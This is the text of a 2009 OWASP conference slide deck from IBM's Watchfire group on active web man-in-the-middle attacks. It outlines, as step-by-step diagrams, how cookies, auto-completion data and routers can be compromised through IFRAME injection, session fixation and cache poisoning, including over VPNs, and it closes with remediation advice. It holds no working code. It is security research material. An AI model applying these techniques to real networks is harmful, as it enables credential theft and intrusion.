A mit m
-
Upload
parsa-danesh -
Category
Engineering
-
view
17 -
download
0
Transcript of A mit m
1
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Active Man in the Middle Attacks
The OWASP Foundation
OWASP
http://www.owasp.org
27/02/2009
Adi Sharabani
Security Research Group ManagerIBM Rational Application Security (a.k.a. Watchfire)
adish
2
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Agenda
Background– Man in the Middle
– Network level – heavily researched
– Web application level – sporadic research
Outline– Passive MitM attacks
– Active MitM attacks
– Penetrating an internal network
– Remediation
3
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Man in the Middle Scenario
All laptop users connect to a public network
Wireless connection can easily be compromised or impersonated
Wired connections might also be compromised
InternetInternet
4
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Rules of Thumb – Don’ts …
Someone might be listening to the requests– Don’t browse sensitive sites
– Don’t supply sensitive information
Someone might be altering the responses– Don’t trust any information given on web sites
– Don’t execute downloaded code
5
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Rules of Thumb – What Can You Do?
This leaves us with:
– Browse your favorite news site
– Browse your favorite weather site
InternetInternetNon-sensitive sites
Boring
Non-sensitive sites
Boring
Sensitive sites
Interesting
Sensitive sites
Interesting
6
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
You are still vulnerable
7
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Mitigating a Fallacy
Fallacy–Executing JavaScript on victim == executing an attack
Reality–Same origin policy
–Executing an attack
–JavaScript + browser implementation bug –JavaScript + execution on a specific domain
– Can be done through XSS
8
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Passive Man in the Middle Attacks
Victim browses to a website
Victim browses to a website
Attacker views the requestmanipulates it
and forwards to server
Attacker views the requestmanipulates it
and forwards to server
Attacker views the responsemanipulates it
and forwards to victim
Attacker views the responsemanipulates it
and forwards to victimServer returns a response Server returns a response
Other servers are not affectedOther servers are not affected
9
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Active Man in the Middle Attack
The attacker actively directs the victim to an “interesting” site The IFrame could be invisible
Victim browses to a “boring” site
Victim browses to a “boring” site
Attack transfers the request to the
server
Attack transfers the request to the
server
Attacker adds an IFRAME referencing an “interesting” site
Attacker adds an IFRAME referencing an “interesting” site Server returns a response Server returns a response
My Weather ChannelMy Weather Channel
My Bank SiteMy Bank Site
Automatic request sent to the interesting server
Automatic request sent to the interesting server
My Bank SiteMy Bank Site
Other servers are not affectedOther servers are not affected
10
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
11
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Stealing Cookies*
Automatic request contains victim’s cookies
Automatic request contains victim’s cookies
Obvious result Stealing cookies associated with any domain attacker desires Will also work for HTTP ONLY cookies
(as opposed to XSS attacks)
* A similar attack was presented by Mike Perry – SideJacking
12
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Demo
13
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Overcoming Same Origin Policy
Attacker adds a malicious scriptto the response
Attacker adds a malicious scriptto the response
Attacker forwards the automatic request to the
“interesting” server
Attacker forwards the automatic request to the
“interesting” serverScript executes with the “interesting” server’s restrictions
Script executes with the “interesting” server’s restrictions
“Interesting” server returns a response
“Interesting” server returns a response
Attacker injects an IFRAME directing to an “interesting”
site
Attacker injects an IFRAME directing to an “interesting”
site
Victim surfs to a “boring” site
Victim surfs to a “boring” site
Automatic request sent to the interesting server
Automatic request sent to the interesting server
Result– Attacker can execute scripts on any domain she desires
– Scripts can fully interact with any “interesting” website Limitations
– Will only work for non SSL web sites
14
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Secure Connections
Login Mechanism
15
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Secure ConnectionsPlease LoginPlease Login
UsernameUsernamePasswordPassword
SUBMIT
jsmith
********
SUBMITVictim browses to site
http://www.webmail.site
Victim browses to sitehttp://www.webmail.site
Site returns a response with login form
Site returns a response with login form
Victim fills login details,and submits the form
Victim fills login details,and submits the form
Login request is sent through a secure channel
Login request is sent through a secure channel
Login SuccessfulLogin Successful
Hello John Smith,
Pre-login action sent in clear text Attacker could alter the pre-login response to make the login
request sent unencrypted
16
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Stealing Auto Completion Information
Script accesses the auto-completion information using the DOM
Script accesses the auto-completion information using the DOM
Attacker redirect victim to a request to a pre-login page
Attacker redirect victim to a request to a pre-login page
Attacker returns the original login form together with a malicious
script
Attacker returns the original login form together with a malicious
script
* A passive version of this attack was described by RSnake in his blog
Result– Attacker can steal any auto-completion information she desires
Limitations– Will only work for pre-login pages not encrypted
– Will not work seamlessly in IE
17
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Demo
18
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Broadening the Attack(Time Dimension)
19
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Passive MitM Attacks
Active MitMAttacks
Active MitMAttacks
Active MitMAttacks
Active MitMAttacks
Present(“boring” sites)
Present(“boring” sites)
Past(“interesting” sites)
Past(“interesting” sites)
Future(“interesting” sites)
Future(“interesting” sites)
20
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Session Fixation
Cookie is being saved on victim’s computer
Cookie is being saved on victim’s computer
Attacker redirects victim to the site of interest
Attacker redirects victim to the site of interest
Attacker returns a page with a cookie generated by server
Attacker returns a page with a cookie generated by server
A while later,victim connects to the site
(with the pre-provided cookie)
A while later,victim connects to the site
(with the pre-provided cookie)
Attacker uses the same cookie to connect to the server
Attacker uses the same cookie to connect to the server
Server authenticates attacker as victim
Server authenticates attacker as victim
Result– Attacker can set persistent cookies on victim
Limitations– The vulnerability also lies within the server
21
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Cache Poisoning
Page is being cached onvictim’s computer
Page is being cached onvictim’s computer
Attacker redirects victim to the site of interest
Attacker redirects victim to the site of interestAttacker returns a malicious page
with cache setting enabled
Attacker returns a malicious page with cache setting enabled
A while later,victim visits the site
A while later,victim visits the site
Result– Attacker can poison any page she desires
– Poisoned pages will be persistent Limitations
– Attacker can poison non SSL resources
22
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Demo
23
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Complex Hacking Virtual Private Networks
24
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Virtual Private Networks (VPN)
VPN client initialization– Create a secure network interface
– Set user’s routing table
VPN client finalization (upon exit or when connection is lost) – Revert routing table
Do not confuse VPN and HTTPS architectures!
25
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
VPN Mixed content
Internal Web SiteInternal Web Site
<html><scriptsrc=http://external/sc.js>...</html>
Result VPN web sites are compromised User is not alerted to the security risk
As opposed to SSL mixed content issues Limitations
Such mixed content is not widely used
Malicious script executes within the secure environment
Malicious script executes within the secure environment
Attacker alters the non-encrypted script
Attacker alters the non-encrypted script
Victim surfs to a page in the VPN network
Victim surfs to a page in the VPN network
26
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Hacking Non-Available Sites
Result Attacker can view and change any HTTP cache object Even for non available sites
27
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
VPN Cache Injection
Attacker disconnects connection to VPN Server
Attacker disconnects connection to VPN Server
After routing table is updated, Attacker poisons the cache of
an internal site
After routing table is updated, Attacker poisons the cache of
an internal siteAttacker recovers connectionAttacker recovers connection
Cached resource loads and malicious cached script executes
Cached resource loads and malicious cached script executes
Attacker redirects victim to cached resource
Attacker redirects victim to cached resource
Result VPN is great for the network level VPN is not enough for the application level
This attack could be applied to other application protocols!
28
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Complex Hacking Intranet Networks
29
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Penetrating Internal Network – Simple Cache Poison
Result Attack will be launched every time victim accesses the resource The attack would executed within the local intranet
Characteristics Firewall protections are helpless Affected servers will never know The attack is persistent
30
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Setting Up a Future MitM Scenario
Result Facilitates future MitM scenarios Does not require router’s credentials Fake settings could be displayed to the user
Limitations Requires victim to access router in the future Need to guess router’s address (10.0.1.1)
Using Active MitM Techniques, attacker poisons victim’s cache
related to his router’s web access
Using Active MitM Techniques, attacker poisons victim’s cache
related to his router’s web access
Router
Victim’s router related cache poisoned with a malicious script
Victim’s router related cache poisoned with a malicious script
Script hides the configuration changes
Script hides the configuration changes
Malicious script executedwhen victim tries to access router
Malicious script executedwhen victim tries to access router Script configures router to tunnel
future communication through attacker
Script configures router to tunnel future communication through
attacker
Outbound Proxy IP Address 216 187 118 221. . .
Primary DNS Server Address 216 187 118 221. . .
31
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Increasing the Exposure
Poison common home pages– Script will execute every time victim opens his browser
Poison common scripts– Script will execute on every page using the common script
– Example: http://www.google-analytics.com/ga.js
The “double active” attack– Common poisoned page redirects to another poisoned resource
..JSJS
32
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
The Double Active Cache Poisoning Attack
Using Active MitM techniques,attacker poisons common
router’s address (i.e. 10.0.1.1)
Using Active MitM techniques,attacker poisons common
router’s address (i.e. 10.0.1.1)
At a later time,Victim opens browser
At a later time,Victim opens browser
Cached home page is loaded and redirects victim’s browser to
router’s web interface
Cached home page is loaded and redirects victim’s browser to
router’s web interface
Cached router’s web interface is loaded and malicious script changes router’s settings
Cached router’s web interface is loaded and malicious script changes router’s settings
Result Internal network has been compromised
Limitation Need to guess router IP and credentials
Attacker also poisons common home pages
Attacker also poisons common home pages
Router
Router is compromised by malicious script
Router is compromised by malicious script
33
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Active Attack Characteristics
–Not noticeable in user’s experience
–Not noticeable by any of the web sites
–IPS/IDS will not block it–Can be persistent
–Can be used to hack into local organization
–Bypasses any firewall or VPN–Can be used with DNS Pinning Techniques
–A problem with the current design
–Requires only one plain HTTP request to be transmitted
34
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Remediation
Users–Do not use auto-completion
–“Clean Slate Policy”
–Trust level separation
–Two different browsers–Two different users–Two different OS –Virtualization products
–Tunnel communication through a secure proxy– Might not be allowed in many hot-spots
35
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Web owners–Consider risks of partial SSL sites
–Do not consider secure VPN connection as an SSL replacement
–Use random tokens for common scripts
– While considering performance issues
– Avoid referring external scripts from internal sites
36
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Industry–Build integrity mechanism for HTTP
–Secure WiFi networks
37
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Summary
Active MitM attacks– broaden the scope of the passive attacks– Design issues
– Dimension of time
– Past (steal cookies, auto-completion information, cache)
– Future (set up cookies, poison cache, poison form filler)
– Penetrating internal networks
– Persistent
– Bypass any current protection mechanisms
More information:– Paper and presentation will be uploaded to our blog:
http://blog.watchfire.com
38
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
References
Watchfire’s Blog: http://blog.watchfire.com Wireless Man in the Middle Attacks:
– http://www.informit.com/articles/article.aspx?p=353735&seqNum=7
SideJacking:– http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html
More on SideJacking:– http://erratasec.blogspot.com/2008/01/more-sidejacking.html
Active SideJacking:– http://seclists.org/bugtraq/2007/Aug/0070.html
Surf Jacking– http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf
Stealing User Information:– http://ha.ckers.org/blog/20060821/stealing-user-information-via-automatic-form-filling/
39
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Thank you!